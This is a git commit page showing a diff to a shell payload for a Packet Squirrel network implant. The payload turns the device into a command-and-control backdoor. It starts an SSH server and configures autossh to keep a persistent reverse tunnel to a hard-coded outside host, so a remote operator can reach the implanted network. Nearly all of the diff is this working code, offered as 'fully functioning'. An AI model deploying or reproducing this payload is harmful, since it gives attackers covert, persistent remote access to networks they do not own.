added functioning payload from dark_pyrro, payload is now fully functioning with autossh.
alaskanhighlander1@gmail.com
parent
a49f410a97
commit
96067bbe7c
|
|
@ -9,56 +9,78 @@
|
|||
#
|
||||
# LED State Descriptions
|
||||
# Magenta Solid - SSH connecting
|
||||
# Blue - SSH connection successful
|
||||
# Amber - SSH connection successful
|
||||
#
|
||||
|
||||
# C2 Server address, port and tunnel port
|
||||
c2_server="192.168.1.145"
|
||||
c2_tunnel_port=2222
|
||||
tunnel_user="username"
|
||||
# no pass needed, headless mode required so RSA key file is used.
|
||||
# generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa'
|
||||
|
||||
# waiting for button press to start SSH connection.
|
||||
#BUTTON
|
||||
#
|
||||
|
||||
# Magenta indicates SSH connection is launching and the server should have received the connection.
|
||||
NETMODE NAT
|
||||
LED SETUP
|
||||
|
||||
echo -e "SETUP Phase\n" >> /root/payloads/switch3/debug.txt
|
||||
|
||||
# we need an IP, so it'll have to be NAT, unless implanted inline.
|
||||
NETMODE NAT
|
||||
sleep 8
|
||||
|
||||
# debug
|
||||
#echo -e "NAT configured.\n" $(ifconfig) >> /root/payloads/switch3/debug.txt
|
||||
|
||||
# fix file permission problems
|
||||
# chmod 600 id_rsa
|
||||
|
||||
# -R indicates remote port forwarding which tunnels connections to localhost on server to client.
|
||||
# Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at
|
||||
# the tunnel port specified on the server to reach the Squirrel.
|
||||
# no pass needed, headless mode required so RSA key file is used.
|
||||
#
|
||||
# default port is 22
|
||||
echo -e "Connecting to Server.\n" >> /root/payloads/switch3/debug.txt
|
||||
# generate the key by running the following command in the /root/.ssh/ folder:
|
||||
# 'ssh -t rsa -b 2048 -f id_rsa'
|
||||
#
|
||||
# To ensure that this works as intended, the user will have to connect to this host at least once
|
||||
# with ssh -i /root/.ssh/id_rsa username@remote_server_ip to add this server to the squirrels list
|
||||
# of trusted hosts.
|
||||
#
|
||||
# If this step fails, the payload will fail.
|
||||
|
||||
autossh_host="root@165.233.121.2"
|
||||
autossh_host_ip=$(echo $autossh_host | cut -d '@' -f2)
|
||||
autossh_port="22"
|
||||
autossh_remoteport="2222"
|
||||
autossh_localport="22"
|
||||
|
||||
if ! grep $autossh_host_ip /root/.ssh/known_hosts; then
|
||||
echo "$autossh_host not in known_hosts, exiting..." >> /root/autossh.log
|
||||
LED FAIL
|
||||
exit 1
|
||||
fi
|
||||
|
||||
#
|
||||
# For the life of me I couldn't get SSH to work. The funny thing was it would
|
||||
# run in the shell command, but not in the payload. The following solution
|
||||
# implements a tool called autossh which ensures nothing funky happens to the
|
||||
# connection.
|
||||
#
|
||||
# the following was ripped from dark_pyrro (the legend) via:
|
||||
# https://codeberg.org/dark_pyrro/Packet-Squirrel-autossh/src/branch/main/payload.sh
|
||||
#
|
||||
|
||||
# waiting until eth1 acquires IP address
|
||||
while ! ifconfig "eth1" | grep "inet addr"; do sleep 1; done
|
||||
|
||||
echo -e "starting server.\n" >> /root/payloads/switch3/debug.txt
|
||||
service sshd start
|
||||
sleep 3
|
||||
|
||||
ssh -R $c2_tunnel_port:127.0.0.1:22 -i /root/payloads/switch3/id_rsa $tunnel_user@$c2_server
|
||||
# echo $ssh_out >> /root/payloads/switch3/debug.txt
|
||||
# ssh_pid=$!
|
||||
# starting sshd and waiting for process to start
|
||||
/etc/init.d/sshd start
|
||||
until netstat -tulpn | grep -qi "sshd"
|
||||
do
|
||||
sleep 1
|
||||
done
|
||||
|
||||
echo -e "Server Connected.\n" >> /root/payloads/switch3/debug.txt
|
||||
# stopping autossh
|
||||
/etc/init.d/autossh stop
|
||||
|
||||
#
|
||||
# Much like the SSH server, AutoSSH has a configuration file. This
|
||||
# needs to be configured to support this connection as a daemon.
|
||||
#
|
||||
# Create a "fresh template" for the autossh configuration
|
||||
# Starting with an empty autossh file in /etc/config
|
||||
# isn't something that uci is very fond of
|
||||
echo "config autossh" > /etc/config/autossh
|
||||
echo " option ssh" >> /etc/config/autossh
|
||||
echo " option enabled" >> /etc/config/autossh
|
||||
|
||||
|
||||
# UCI configuration and commission
|
||||
uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -R "$autossh_remoteport":127.0.0.1:"$autossh_localport" "$autossh_host" -p "$autossh_port" -N -T"
|
||||
uci set autossh.@autossh[0].enabled="1"
|
||||
uci commit autossh
|
||||
|
||||
LED ATTACK
|
||||
# WARNING: Initial SSH connection must be manual, since c2_server may not be included in trusted_hosts file
|
||||
# SSH will prompt for verification, and to add host to trusted hosts file.
|
||||
|
||||
#BUTTON 365d && {
|
||||
# kill $ssh_pid
|
||||
#}
|
||||
# starting autossh
|
||||
/etc/init.d/autossh start
|
||||
Loading…
Reference in New Issue